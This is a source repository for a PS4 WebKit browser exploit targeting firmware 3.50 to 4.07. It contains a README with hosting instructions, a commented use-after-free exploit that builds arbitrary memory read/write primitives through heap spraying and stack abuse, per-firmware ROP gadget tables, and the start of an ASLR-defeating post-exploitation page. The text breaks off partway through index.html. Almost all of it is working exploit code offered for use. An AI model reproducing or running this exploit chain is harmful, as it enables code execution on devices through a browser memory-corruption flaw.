├── README.md
├── expl.js
├── gadgets.js
├── index.html
├── rop.js
└── syscalls.js


/README.md:
--------------------------------------------------------------------------------
 1 | PS4 4.0x Code Execution
 2 | ==============
 3 | This repo is my edit of the [4.0x webkit exploit](http://rce.party/ps4/) released by [qwertyoruiopz](https://twitter.com/qwertyoruiopz). The edit re-organizes, comments, and adds portability across 3.50 - 4.07 (3.50, 3.55, 3.70, 4.00, and of course 4.06/4.07). The commenting and reorganization was mostly for my own learning experience, however hopefully others can find these comments helpful and build on them or even fix them if I've made mistakes. The exploit is much more stable than FireKaku and sets up the foundation for running basic ROP chains and returns to normal execution. Credit for the exploit goes completely to qwertyoruiopz.
 4 | 
 5 | Organization
 6 | ==============
 7 | Files in order by name alphabetically;
 8 | * expl.js - Contains the heart of the exploit and establishes a read/write primitive.
 9 | * gadgets.js - Contains gadget maps and function stub maps for a variety of firmwares. Which map is used is determined in the post-exploitation phase.
10 | * index.html - The main page for the exploit. Launches the exploit and contains post-exploitation stuff, as well as output and code execution.
11 | * rop.js - Contains the ROP framework modified from Qwerty's original exploit as well as the array in which module base addresses are held and gadget addresses are calculated.
12 | * syscalls.js - Contains a system call map for a variety of firmwares as well as a 'name -> number' map for syscall ID's.
13 | 
14 | Usage
15 | ==============
16 | Simply setup a web-server on localhost using xampp or any other program and setup these files in a directory. You can then go to your computer's local IPv4 address (found by running ipconfig in cmd.exe) and access the exploit.
17 | 
18 | Notes
19 | ==============
20 | * The exploit is pretty stable but will still sometimes crash. If the browser freezes simply back out and retry, if a segmentation fault (identified by prompt "You do not have enough free system memory") occurs, refresh the page before trying again as it seems to lead to better results.
21 | * This only allows code execution in ring3, to get ring0 execution a kernel exploit and KROP chain is needed.
22 | * If I've made an error (particularily having to do with firmware compatibility and gadgets) feel free to open an issue on the repo.
23 | * The exploit has been tested on 3.55 and 4.00, it is assumed to work on other firmwares listed but not guaranteed, again if you encounter a problem - open an issue on the repo.
24 | 
25 | Credits
26 | ==============
27 | qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/).
28 | 


--------------------------------------------------------------------------------
/expl.js:
--------------------------------------------------------------------------------
  1 | /* Set up variables that will be used later on */
  2 | var _dview;
  3 | 
  4 | /*
  5 |   Zero out a buffer
  6 | */
  7 | function zeroFill( number, width )
  8 | {
  9 |   width -= number.toString().length;
 10 |   if ( width > 0 )
 11 |   {
 12 |     return new Array( width + (/\./.test( number ) ? 2 : 1) ).join( '0' ) + number;
 13 |   }
 14 |   return number + ""; // always return a string
 15 | }
 16 | 
 17 | /*
 18 |   Int64 library for address operations
 19 | */
 20 | function int64(low,hi) {
 21 |   this.low = (low>>>0);
 22 |   this.hi = (hi>>>0);
 23 |   this.add32inplace = function(val) {
 24 |     var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 25 |     var new_hi = (this.hi >>> 0);
 26 |     if (new_lo < this.low) {
 27 |       new_hi++;
 28 |     }
 29 |     this.hi=new_hi;
 30 |     this.low=new_lo;
 31 |   }
 32 |   this.add32 = function(val) {
 33 |     var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 34 |     var new_hi = (this.hi >>> 0);
 35 |     if (new_lo < this.low) {
 36 |       new_hi++;
 37 |     }
 38 |     return new int64(new_lo, new_hi);
 39 |   }
 40 |   this.sub32 = function(val) {
 41 |     var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 42 |     var new_hi = (this.hi >>> 0);
 43 |     if (new_lo > (this.low) & 0xFFFFFFFF) {
 44 |       new_hi--;
 45 |     }
 46 |     return new int64(new_lo, new_hi);
 47 |   }
 48 |   this.sub32inplace = function(val) {
 49 |     var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 50 |     var new_hi = (this.hi >>> 0);
 51 |     if (new_lo > (this.low) & 0xFFFFFFFF) {
 52 |       new_hi--;
 53 |     }
 54 |     this.hi=new_hi;
 55 |     this.low=new_lo;
 56 |   }
 57 |   this.and32 = function(val) {
 58 |     var new_lo = this.low & val;
 59 |     var new_hi = this.hi;
 60 |     return new int64(new_lo, new_hi);
 61 |   }
 62 |   this.and64 = function(vallo, valhi) {
 63 |     var new_lo = this.low & vallo;
 64 |     var new_hi = this.hi & valhi;
 65 |     return new int64(new_lo, new_hi);
 66 |   }
 67 |   this.toString = function(val) {
 68 |     val = 16; // eh
 69 |     var lo_str = (this.low >>> 0).toString(val);
 70 |     var hi_str = (this.hi >>> 0).toString(val);
 71 |     if(this.hi == 0) return lo_str;
 72 |     else {
 73 |       lo_str = zeroFill(lo_str, 8)
 74 |     }
 75 |     return hi_str+lo_str;
 76 |   }
 77 |   this.toPacked = function() {
 78 |     return {hi: this.hi, low: this.low};
 79 |   }
 80 |   this.setPacked = function(pck) {
 81 |     this.hi=pck.hi;
 82 |     this.low=pck.low;
 83 |     return this;
 84 |   }
 85 | 
 86 |   return this;
 87 | }
 88 | 
 89 | var memPressure = new Array(400);   // For forcing GC via memory pressure
 90 | var stackFrame  = [];               // Our fake stack in memory
 91 | var frameIndex  = 0;                // Set index in fake stack to 0 (0xFF00)
 92 | var stackPeek   = 0;
 93 | 
 94 | /* Force garbage collection via memory pressure */
 95 | var doGarbageCollection = function()
 96 | {
 97 |   /* Apply memory pressure */
 98 |   for (var i = 0; i < memPressure.length; i++)
 99 |   {
100 |     memPressure[i] = new Uint32Array(0x10000);
101 |   }
102 | 
103 |   /* Zero out the buffer */
104 |   for (var i = 0; i < memPressure.length; i++)
105 |   {
106 |     memPressure[i] = 0;
107 |   }
108 | }
109 | 
110 | /* For peeking the stack (reading) */
111 | function peek_stack()
112 | {
113 |   var mem;
114 |   var retno;
115 |   var oldRetno;
116 | 
117 |   /* Set arguments.length to return 0xFFFF on first call, and 1 on subsequent calls */
118 |   retno = 0xFFFF;
119 | 
120 |   arguments.length =
121 |   {
122 |     valueOf: function()
123 |     {
124 |       oldRetno = retno;
125 |       retno = 1;
126 |       return oldRetno;
127 |     }
128 |   }
129 | 
130 |   /*
131 |     What this essentially does is when function.prototype.apply() is called, it will
132 |     check arguments length. Where it should return 1 (the actual size), it actually
133 |     returns 0xFFFF due to the function above. This allows an out-of-bounds read
134 |     on the stack, and allows us to control uninitialized memory regions
135 |   */
136 |   var args = arguments;
137 | 
138 |   (function() {
139 |     (function() {
140 |       (function() {
141 |         mem = arguments[0xFF00];
142 |       }).apply(undefined, args);
143 |     }).apply(undefined, stackFrame);
144 |   }).apply(undefined, stackFrame);
145 | 
146 |   stackPeek = mem;
147 | 
148 |   return mem;
149 | }
150 | 
151 | /* For poking the stack (writing) */
152 | function poke_stack(val)
153 | {
154 |   /* Set stack frame value @ frameIndex */
155 |   stackFrame[frameIndex] = val;
156 | 
157 |   /* Apply to uninitialized memory region on the stack */
158 |   (function() {
159 |     (function() {
160 |       (function() {
161 |       }).apply(null, stackFrame);
162 |     }).apply(null, stackFrame);
163 |   }).apply(null, stackFrame);
164 | 
165 |   /* Clear value in stack frame @ frameIndex as it's been applied already */
166 |   stackFrame[frameIndex] = "";
167 | }
168 | 
169 | /* Run exploit PoC */
170 | function run() {
171 |   try
172 |   {
173 |     /*
174 |       Set each integer in the stackframe to it's index, this way we can peek
175 |       the stack to align it
176 |     */
177 |     for(var i = 0; i < 0xFFFF; i++)
178 |     {
179 |       stackFrame[i] = i;
180 |     }
181 | 
182 |     /*
183 |       Attempt to poke and peek the stack. If the peek returns null, it means
184 |       the out-of-bounds read failed, throw an exception and catch it.
185 |     */
186 |     frameIndex = 0;
187 |     poke_stack(0);
188 | 
189 |     if (peek_stack() == undefined) {
190 |       throw "System is not vulnerable!";
191 |     }
192 | 
193 |     /* Setup our stack frame so our target object reference resides inside of it */
194 |     frameIndex = 0;
195 |     poke_stack(0);
196 | 
197 |     peek_stack();
198 |     frameIndex = stackPeek;
199 | 
200 |     /* Align the stack frame */
201 |     poke_stack(0x4141);
202 | 
203 |     for (var align = 0; align < 8; align++)
204 |       (function(){})();
205 | 
206 |     /* Test if we aligned our stack frame properly, if not throw exception and catch */
207 |     peek_stack();
208 | 
209 |     if (stackPeek != 0x4141)
210 |     {
211 |       throw "Couldn't align stack frame to stack!";
212 |     }
213 | 
214 |     /* Setup spray to overwrite the length header in UAF'd object's butterfly */
215 |     var butterflySpray = new Array(0x1000);
216 | 
217 |     for (var i = 0; i < 0x1000; i++)
218 |     {
219 |       butterflySpray[i] = [];
220 | 
221 |       for (var k = 0; k < 0x40; k++)
222 |       {
223 |         butterflySpray[i][k] = 0x42424242;
224 |       }
225 | 
226 |       butterflySpray[i].unshift(butterflySpray[i].shift());
227 |     }
228 | 
229 |     /* Spray marked space */
230 |     var sprayOne = new Array(0x100);
231 | 
232 |     for (var i = 0; i < 0x100; i++)
233 |     {
234 |       sprayOne[i] = [1];
235 | 
236 |       if (!(i & 3))
237 |       {
238 |         for (var k = 0; k < 0x8; k++)
239 |         {
240 |           sprayOne[i][k] = 0x43434343;
241 |         }
242 |       }
243 | 
244 |       sprayOne[i].unshift(sprayOne[i].shift());
245 |     }
246 | 
247 |     var sprayTwo = new Array(0x400);
248 | 
249 |     for (var i = 0; i < 0x400; i++)
250 |     {
251 |       sprayTwo[i] = [2];
252 | 
253 |       if (!(i & 3))
254 |       {
255 |         for (var k = 0; k < 0x80; k++)
256 |         {
257 |           sprayTwo[i][k] = 0x43434343;
258 |         }
259 |       }
260 | 
261 |       sprayTwo[i].unshift(sprayTwo[i].shift());
262 |     }
263 | 
264 |     /* Setup target object for UAF, spray */
265 |     var uafTarget = [];
266 | 
267 |     for (var i = 0; i < 0x80; i++) {
268 |       uafTarget[i] = 0x42420000;
269 |     }
270 | 
271 |     /* Store target on the stack to maintain a reference after forced garbage collection */
272 |     poke_stack(uafTarget);
273 | 
274 |     /* Remove references so they're free'd when garbage collection occurs */
275 |     uafTarget = 0;
276 |     sprayOne = 0;
277 |     sprayTwo = 0;
278 | 
279 |     /* Force garbage collection */
280 |     for (var k = 0; k < 4; k++)
281 |       doGarbageCollection();
282 | 
283 |     /* Re-collect our maintained reference from the stack */
284 |     peek_stack();
285 |     uafTarget = stackPeek;
286 | 
287 |     stackPeek = 0;
288 | 
289 |     /*
290 |       We now have access to uninitialized memory, force a heap overflow by
291 |       overwriting the "length" field of our UAF'd object's butterfly via spraying
292 |     */
293 |     for (var i = 0; i < 0x1000; i++)
294 |     {
295 |       for (var k = 0x0; k < 0x80; k++)
296 |       {
297 |         butterflySpray[i][k] = 0x7FFFFFFF;
298 | 
299 |         /*
300 |           Find our UAF'd object via modified length, which should be the maximum
301 |           value for a 32-bit integer. If it is, we've successfully modified our
302 |           butterfly's length header!
303 |         */
304 |         if (uafTarget.length == 0x7FFFFFFF)
305 |         {
306 |           /* Store index of butterfly for UAF'd object for primitiveSpray */
307 |           var butterflyIndex = i;
308 | 
309 |           /* Remove all references except what we need to free memory */
310 |           for (var i = 0; i < butterflyIndex; i++)
311 |             butterflySpray[i] = 0;
312 | 
313 |           for (var i = butterflyIndex + 1; i < 0x1000; i++)
314 |             butterflySpray[i] = 0;
315 | 
316 |           doGarbageCollection();
317 | 
318 |           /* Spray to obtain a read/write primitive */
319 |           var primitiveSpray = new Array(0x20000);
320 |           var potentialPrim = new ArrayBuffer(0x1000);
321 | 
322 |           for (var i = 0; i < 0x20000; i++)
323 |           {
324 |             primitiveSpray[i] = i;
325 |           }
326 | 
327 |           var overlap = new Array(0x80);
328 | 
329 |           /* Setup potential uint32array slaves for our read/write primitive */
330 |           for (var i = 0; i < 0x20000; i++)
331 |           {
332 |             primitiveSpray[i] = new Uint32Array(potentialPrim);
333 |           }
334 | 
335 |           /* Find a slave uint32array from earlier spray */
336 |           var currentQword  = 0x10000;
337 |           var found         = false;
338 |           var smashedButterfly  = new int64(0,0);
339 |           var origData          = new int64(0, 0);
340 |           var locateHelper      = new int64(0, 0);
341 | 
342 |           while (!found)
343 |           {
344 |             /*
345 |               Change qword value for uint32array size to 0x1337 in UAF'd object
346 |               to defeat U-ASLR
347 |             */
348 |             var savedVal = uafTarget[currentQword];
349 |             uafTarget[currentQword] = 0x1337;
350 | 
351 |             /* Check sprayed uint32array slaves for modified size */
352 |             for (var i = 0; i < 0x20000; i++)
353 |             {
354 |               if (primitiveSpray[i] && primitiveSpray[i].byteLength != 0x1000)
355 |               {
356 |                 /*
357 |                   Found our primitive! Restore uint32array size as 0x1000 is
358 |                   sufficient.
359 |                 */
360 |                 uafTarget[currentQword] = savedVal;
361 | 
362 |                 var primitive = primitiveSpray[i];
363 |                 var overlap = [1337];
364 | 
365 |                 uafTarget[currentQword - 5] = overlap;
366 | 
367 |                 smashedButterfly.low  = primitive[2];
368 |                 smashedButterfly.hi   = primitive[3];
369 |                 smashedButterfly.keep_gc = overlap;
370 | 
371 |                 /* Find previous ArrayBufferView */
372 |                 uafTarget[currentQword - 5] = uafTarget[currentQword - 2];
373 | 
374 |                 butterflySpray[butterflyIndex][k] = 0;
375 | 
376 |                 origData.low = primitive[4];
377 |                 origData.hi  = primitive[5];
378 | 
379 |                 primitive[4]  = primitive[12];
380 |                 primitive[5]  = primitive[13];
381 |                 primitive[14] = 0x40;
382 | 
383 |                 /* Find our uint32array slave for writing values */
384 |                 var slave = undefined;
385 | 
386 |                 for (var k = 0; k < 0x20000; k++)
387 |                 {
388 |                   if (primitiveSpray[k].length == 0x40)
389 |                   {
390 |                     slave = primitiveSpray[k];
391 |                     break;
392 |                   }
393 |                 }
394 | 
395 |                 if(!slave)
396 |                   throw "Could not find slave for write primitive!";
397 | 
398 |                 /* Set primitive address to that of the smashed butterfly's */
399 |                 primitive[4] = smashedButterfly.low;
400 |                 primitive[5] = smashedButterfly.hi;
401 | 
402 |                 /* Setup primitive and slave for primitive functions */
403 |                 overlap[0] = uafTarget;
404 | 
405 |                 var targetEntry = new int64(slave[0], slave[1]);
406 | 
407 |                 primitive[4] = targetEntry.low;
408 |                 primitive[5] = targetEntry.hi;
409 |                 slave[2]     = 0;
410 |                 slave[3]     = 0;
411 | 
412 |                 /* Clear references for future collection from GC */
413 |                 uafTarget = 0;
414 |                 primitiveSpray = 0;
415 | 
416 |                 /* Finally restore primitive address to it's original state */
417 |                 primitive[4] = origData.low;
418 |                 primitive[5] = origData.hi;
419 | 
420 |                 /*
421 |                   Derive primitive functions
422 |                 */
423 | 
424 |                 /* Purpose: Leak object addresses for ASLR defeat */
425 |                 var leakval = function(obj)
426 |                 {
427 |                   primitive[4] = smashedButterfly.low;
428 |                   primitive[5] = smashedButterfly.hi;
429 | 
430 |                   overlap[0] = obj;
431 | 
432 |                   var val = new int64(slave[0], slave[1]);
433 | 
434 |                   slave[0] = 1337;
435 |                   slave[1] = 0xffff0000;
436 | 
437 |                   primitive[4] = origData.low;
438 |                   primitive[5] = origData.hi;
439 | 
440 |                   return val;
441 |                 }
442 | 
443 |                 /* Purpose: Create a value (used for checking the primitive) */
444 |                 var createval = function(val)
445 |                 {
446 |                   primitive[4] = smashedButterfly.low;
447 |                   primitive[5] = smashedButterfly.hi;
448 | 
449 |                   slave[0] = val.low;
450 |                   slave[1] = val.hi;
451 | 
452 |                   var val = overlap[0];
453 | 
454 |                   slave[0] = 1337;
455 |                   slave[1] = 0xffff0000;
456 | 
457 |                   primitive[4] = origData.low;
458 |                   primitive[5] = origData.hi;
459 | 
460 |                   return val;
461 |                 }
462 | 
463 |                 /* Purpose: Read 32-bits (or 4 bytes) from address */
464 |                 var read32 = function(addr)
465 |                 {
466 |                   primitive[4] = addr.low;
467 |                   primitive[5] = addr.hi;
468 | 
469 |                   var val = slave[0];
470 | 
471 |                   primitive[4] = origData.low;
472 |                   primitive[5] = origData.hi;
473 | 
474 |                   return val;
475 |                 }
476 | 
477 |                 /* Purpose: Read 64-bits (or 8 bytes) from address */
478 |                 var read64 = function(addr)
479 |                 {
480 |                   primitive[4] = addr.low;
481 |                   primitive[5] = addr.hi;
482 | 
483 |                   var val = new int64(slave[0], slave[1]);
484 | 
485 |                   primitive[4] = origData.low;
486 |                   primitive[5] = origData.hi;
487 | 
488 |                   return val;
489 |                 }
490 | 
491 |                 /* Purpose: Write 32-bits (or 4 bytes) to address */
492 |                 var write32 = function(addr, val)
493 |                 {
494 |                   primitive[4] = addr.low;
495 |                   primitive[5] = addr.hi;
496 | 
497 |                   slave[0] = val;
498 | 
499 |                   primitive[4] = origData.low;
500 |                   primitive[5] = origData.hi;
501 |                 }
502 | 
503 |                 /* Purpose: Write 64-bits (or 8 bytes) to address */
504 |                 var write64 = function(addr, val)
505 |                 {
506 |                   primitive[4] = addr.low;
507 |                   primitive[5] = addr.hi;
508 | 
509 |                   if (val == undefined)
510 |                   {
511 |                     val = new int64(0,0);
512 |                   }
513 |                   if (!(val instanceof int64))
514 |                   {
515 |                     val = new int64(val,0);
516 |                   }
517 | 
518 |                   slave[0] = val.low;
519 |                   slave[1] = val.hi;
520 | 
521 |                   primitive[4] = origData.low;
522 |                   primitive[5] = origData.hi;
523 |                 }
524 | 
525 |                 if (createval(leakval(0x1337)) != 0x1337) {
526 |                   throw "Primitive is broken, jsvalue leaked does not match jsvalue created!";
527 |                 }
528 | 
529 |                 var testData = [1,2,3,4,5,6,7,8];
530 | 
531 |                 var testAddr = leakval(testData);
532 | 
533 |                 var butterflyAddr = read64(testAddr.add32(8));
534 | 
535 |                 if ((butterflyAddr.low == 0 && butterflyAddr.hi == 0) || createval(read64(butterflyAddr)) != 1) {
536 |                   throw "Primitive is broken, either butterfly address is null or object is not a valid jsvalue!";
537 |                 }
538 | 
539 |                 if (window.postexploit) {
540 |                   window.postexploit({
541 |                     read4: read32,
542 |                     read8: read64,
543 |                     write4: write32,
544 |                     write8: write64,
545 |                     leakval: leakval,
546 |                     createval: createval
547 |                   });
548 |                 }
549 |                 return 2;
550 |               }
551 |             }
552 |             uafTarget[currentQword] = savedVal;
553 |             currentQword ++;
554 |           }
555 |         }
556 |       }
557 |     }
558 |     /*
559 |       If we ended up here, the exploit failed to find our resized object/we were
560 |       not able to modify the UaF'd target's length :(
561 |     */
562 |     return 1;
563 |   }
564 |   catch (e)
565 |   {
566 |     alert(e);
567 |   }
568 | }
569 | 
570 | window.onload = function() { document.getElementById("clck").innerHTML = '<a href="javascript:run()">go</a>'; };
571 | 


--------------------------------------------------------------------------------
/gadgets.js:
--------------------------------------------------------------------------------
  1 | /* For storing the gadget and import map */
  2 | window.gadgetMap = [];
  3 | window.basicImportMap = [];
  4 | 
  5 | /* All function stubs / imports from other modules */
  6 | var generateBasicImportMap = function()
  7 | {
  8 |   window.basicImportMap =
  9 |   {
 10 |     '3.50':
 11 |     {
 12 |       'setjmp':            getGadget('libSceWebKit2', 0x2B8),     // setjmp imported from libkernel
 13 |       '__stack_chk_fail':  getGadget('libSceWebKit2', 0x276D150), // __stack_chk_fail imported from libkernel
 14 |     },
 15 | 
 16 |     '3.55':
 17 |     {
 18 |       'setjmp':            getGadget('libSceWebKit2', 0x2B8),     // setjmp imported from libkernel
 19 |       '__stack_chk_fail':  getGadget('libSceWebKit2', 0x276D150), // __stack_chk_fail imported from libkernel
 20 |     },
 21 | 
 22 |     '3.70':
 23 |     {
 24 |       'setjmp':            getGadget('libSceWebKit2', 0x2B8),     // setjmp imported from libkernel
 25 |       '__stack_chk_fail':  getGadget('libSceWebKit2', 0x276D150), // __stack_chk_fail imported from libkernel
 26 |     },
 27 | 
 28 |     '4.00':
 29 |     {
 30 |       'setjmp':            getGadget('libSceWebKit2', 0x270),     // setjmp imported from libkernel
 31 |       '__stack_chk_fail':  getGadget('libSceWebKit2', 0x2729260), // __stack_chk_fail imported from libkernel
 32 |     },
 33 | 
 34 |     '4.06':
 35 |     {
 36 |       'setjmp':            getGadget('libSceWebKit2', 0x270),     // setjmp imported from libkernel
 37 |       '__stack_chk_fail':  getGadget('libSceWebKit2', 0x273D260), // __stack_chk_fail imported from libkernel
 38 |     },
 39 | 
 40 |     '4.07':
 41 |     {
 42 |       'setjmp':            getGadget('libSceWebKit2', 0x270),     // setjmp imported from libkernel
 43 |       '__stack_chk_fail':  getGadget('libSceWebKit2', 0x273D260), // __stack_chk_fail imported from libkernel
 44 |     }
 45 |   };
 46 | }
 47 | 
 48 | /* All gadgets from the binary of available modules */
 49 | var generateGadgetMap = function()
 50 | {
 51 |   window.gadgetMap =
 52 |   {
 53 |     '3.50':
 54 |     {
 55 |       'pop rsi':  getGadget('libSceWebKit2', 0xB9EBB),
 56 |       'pop rdi':  getGadget('libSceWebKit2', 0x113991),
 57 |       'pop rax':  getGadget('libSceWebKit2', 0x1C6AB),
 58 |       'pop rcx':  getGadget('libSceWebKit2', 0x3CA9FD),
 59 |       'pop rdx':  getGadget('libSceWebKit2', 0x1AFA),
 60 |       'pop r8':   getGadget('libSceWebKit2', 0x4C13BD),
 61 |       'pop r9':   getGadget('libSceWebKit2', 0xEE0A8F),
 62 |       'pop rsp':  getGadget('libSceWebKit2', 0x376850),
 63 | 
 64 |       'mov rax, rdi':             getGadget('libSceWebKit2', 0x57C3),
 65 |       'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x11FC37),
 66 |       'mov qword ptr [rdi], rsi': getGadget('libSceWebKit2', 0x4584D0),
 67 | 
 68 |       'jmp addr': getGadget('libSceWebKit2', 0x86D4F4),
 69 |     },
 70 | 
 71 |     '3.55':
 72 |     {
 73 |       'pop rsi':  getGadget('libSceWebKit2', 0xB9EBB),
 74 |       'pop rdi':  getGadget('libSceWebKit2', 0x113991),
 75 |       'pop rax':  getGadget('libSceWebKit2', 0x1C6AB),
 76 |       'pop rcx':  getGadget('libSceWebKit2', 0x3CA9FD),
 77 |       'pop rdx':  getGadget('libSceWebKit2', 0x1AFA),
 78 |       'pop r8':   getGadget('libSceWebKit2', 0x4C13BD),
 79 |       'pop r9':   getGadget('libSceWebKit2', 0xEE0A8F),
 80 |       'pop rsp':  getGadget('libSceWebKit2', 0x376850),
 81 | 
 82 |       'mov rax, rdi':             getGadget('libSceWebKit2', 0x57C3),
 83 |       'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x11FC37),
 84 |       'mov qword ptr [rdi], rsi': getGadget('libSceWebKit2', 0x4584D0),
 85 | 
 86 |       'jmp addr': getGadget('libSceWebKit2', 0x86D4F4),
 87 |     },
 88 | 
 89 |     '3.70':
 90 |     {
 91 |       'pop rsi':  getGadget('libSceWebKit2', 0xB9EBB),
 92 |       'pop rdi':  getGadget('libSceWebKit2', 0x113991),
 93 |       'pop rax':  getGadget('libSceWebKit2', 0x1C6AB),
 94 |       'pop rcx':  getGadget('libSceWebKit2', 0x3CA71B),
 95 |       'pop rdx':  getGadget('libSceWebKit2', 0x1AFA),
 96 |       'pop r8':   getGadget('libSceWebKit2', 0x1C6AA),
 97 |       'pop r9':   getGadget('libSceWebKit2', 0xEE0A8F),
 98 |       'pop rsp':  getGadget('libSceWebKit2', 0x376850),
 99 | 
100 |       'mov rax, rdi':             getGadget('libSceWebKit2', 0x57C3),
101 |       'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x11FC37),
102 |       'mov qword ptr [rdi], rsi': getGadget('libSceWebKit2', 0x4584D0),
103 | 
104 |       'jmp addr': getGadget('libSceWebKit2', 0x86D4F4),
105 |     },
106 | 
107 |     '4.00':
108 |     {
109 |       'pop rsi':  getGadget('libSceWebKit2', 0xA459E),
110 |       'pop rdi':  getGadget('libSceWebKit2', 0x10F1C1),
111 |       'pop rax':  getGadget('libSceWebKit2', 0x1D70B),
112 |       'pop rcx':  getGadget('libSceWebKit2', 0x1FCA9B),
113 |       'pop rdx':  getGadget('libSceWebKit2', 0xD6660),
114 |       'pop r8':   getGadget('libSceWebKit2', 0x4A3B0D),
115 |       'pop r9':   getGadget('libSceWebKit2', 0xEB5F8F),
116 |       'pop rsp':  getGadget('libSceWebKit2', 0x20AEB0),
117 | 
118 |       'mov rax, rdi':             getGadget('libSceWebKit2', 0x5863),
119 |       'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x11ADD7),
120 |       'mov qword ptr [rdi], rsi': getGadget('libSceWebKit2', 0x43CF70),
121 | 
122 |       'jmp addr': getGadget('libSceWebKit2', 0x852624),
123 |     },
124 | 
125 |     '4.06':
126 |     {
127 |       'pop rsi':  getGadget('libSceWebKit2', 0xA459E),
128 |       'pop rdi':  getGadget('libSceWebKit2', 0x10F1C1),
129 |       'pop rax':  getGadget('libSceWebKit2', 0x1D70B),
130 |       'pop rcx':  getGadget('libSceWebKit2', 0x25EF03),
131 |       'pop rdx':  getGadget('libSceWebKit2', 0x1D12),
132 |       'pop r8':   getGadget('libSceWebKit2', 0x1D70A),
133 |       'pop r9':   getGadget('libSceWebKit2', 0xEB5F8F),
134 |       'pop rsp':  getGadget('libSceWebKit2', 0x20AEB0),
135 | 
136 |       'mov rax, rdi':             getGadget('libSceWebKit2', 0x5863),
137 |       'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x11ADD7),
138 |       'mov qword ptr [rdi], rsi': getGadget('libSceWebKit2', 0x43CF70),
139 | 
140 |       'jmp addr': getGadget('libSceWebKit2', 0x852624),
141 |     },
142 | 
143 |     '4.07':
144 |     {
145 |       'pop rsi':  getGadget('libSceWebKit2', 0xA459E),
146 |       'pop rdi':  getGadget('libSceWebKit2', 0x10F1C1),
147 |       'pop rax':  getGadget('libSceWebKit2', 0x1D70B),
148 |       'pop rcx':  getGadget('libSceWebKit2', 0x25EF03),
149 |       'pop rdx':  getGadget('libSceWebKit2', 0x1D12),
150 |       'pop r8':   getGadget('libSceWebKit2', 0x1D70A),
151 |       'pop r9':   getGadget('libSceWebKit2', 0xEB5F8F),
152 |       'pop rsp':  getGadget('libSceWebKit2', 0x20AEB0),
153 | 
154 |       'mov rax, rdi':             getGadget('libSceWebKit2', 0x5863),
155 |       'mov qword ptr [rdi], rax': getGadget('libSceWebKit2', 0x11ADD7),
156 |       'mov qword ptr [rdi], rsi': getGadget('libSceWebKit2', 0x43CF70),
157 | 
158 |       'jmp addr': getGadget('libSceWebKit2', 0x852624),
159 |     }
160 |   };
161 | }
162 | 


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This page was originally made by qwertyoruiopz -->
  2 | <html>
  3 | <head>
  4 |   <title>JailbreakMe PS4 3.5x/3.70/4.0x</title>
  5 |   <meta name="viewport" content="user-scalable=1.0,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0">
  6 |   <meta name="apple-mobile-web-app-capable" content="no">
  7 |   <meta name="format-detection" content="telephone=no">
  8 |   <link rel="apple-touch-icon" href="touch-icon-iphone.png">
  9 |   <meta name="apple-mobile-web-app-title" content="JailbreakMe" />
 10 |   <style>
 11 |     body
 12 |     {
 13 |       overflow: hidden;
 14 |       position: fixed;
 15 |       position: relative;
 16 |     }
 17 | 
 18 |     h1
 19 |     {
 20 |       overflow: hidden;
 21 |       position: fixed;
 22 |       position: absolute;
 23 |       top: 40%;
 24 |       left: 50%;
 25 |       transform: translate(-50%, -50%);
 26 |     }
 27 | 
 28 |     footer
 29 |     {
 30 |       position: absolute;
 31 |       left: 0;
 32 |       bottom: 0;
 33 |       height: 40px;
 34 |       width: 100%;
 35 |       overflow:hidden;
 36 |     }
 37 |   </style>
 38 |   <script src=syscalls.js></script>
 39 | </head>
 40 | <body>
 41 |   <script>
 42 |     /* Get user agent for determining system firmware */
 43 |     var ua = navigator.userAgent;
 44 | 
 45 |     /* Called from exploit.js upon success */
 46 |     window.postexploit = function(p)
 47 |     {
 48 |       var fwFromUA = ua.substring(ua.indexOf("5.0 (") + 19, ua.indexOf(") Apple"));
 49 |       document.getElementById("clck").style.display = 'none';
 50 | 
 51 |       var print = function(string) {
 52 |         document.getElementById("console").innerHTML += string + "\n";
 53 |       }
 54 | 
 55 |       print("=== Exploit Successful ===");
 56 | 
 57 |       /* Used to leak parseFloat() for deriving webkit's base address and calling */
 58 |       p.leakFunction = function(smashFunction) {
 59 |         var smashObj  = p.leakval(smashFunction);
 60 |         var smashBase = p.read8(smashObj.add32(0x18));
 61 |         return smashBase.add32(0x20);
 62 |       }
 63 | 
 64 |       var funcPointer = p.read8(p.leakFunction(parseFloat));
 65 | 
 66 |       /* Calculate slide */
 67 |       var webkitBase = funcPointer.add32(0); // copy
 68 |       webkitBase.low &= ~0xFFF;
 69 |       webkitBase.sub32inplace(0x55000);
 70 | 
 71 |       moduleBaseAddresses['libSceWebKit2']  = webkitBase;
 72 | 
 73 |       /* Get import map based on firmware from user-agent string */
 74 |       generateBasicImportMap();
 75 | 
 76 |       if(window.basicImportMap[fwFromUA] != null)
 77 |       {
 78 |         window.basicImports = window.basicImportMap[fwFromUA];
 79 |       }
 80 |       else
 81 |       {
 82 |         throw new Error("System may be vulnerable but does not have a valid import map!");
 83 |       }
 84 | 
 85 |       /*
 86 |         I was originally going to calculate libkernel's address via libSceSysmodule
 87 |         however since we may require libkernel's address for some gadgets in the future
 88 |         anyway, it's better to do it qwerty's way by leaking the stack_chk_fail import pointer.
 89 |       */
 90 |       var libkernel = p.read8(window.basicImports['__stack_chk_fail']);
 91 |       libkernel.low &= ~0xFFF;
 92 |       libkernel.sub32inplace(0xd000);
 93 | 
 94 |       moduleBaseAddresses['libkernel']  = libkernel;
 95 | 
 96 |       /* Get gadget map based on firmware from user-agent string */
 97 |       generateGadgetMap();
 98 | 
 99 |       if(gadgetMap[fwFromUA] != null)
100 |       {
101 |         window.gadgets = gadgetMap[fwFromUA];
102 |       }
103 |       else
104 |       {
105 |         throw new Error("System may be vulnerable but does not have a valid gadget map!");
106 |       }
107 | 
108 |       /* Get syscall map based on firmware from user-agent string */
109 |       if(syscallMap[fwFromUA] != null)
110 |       {
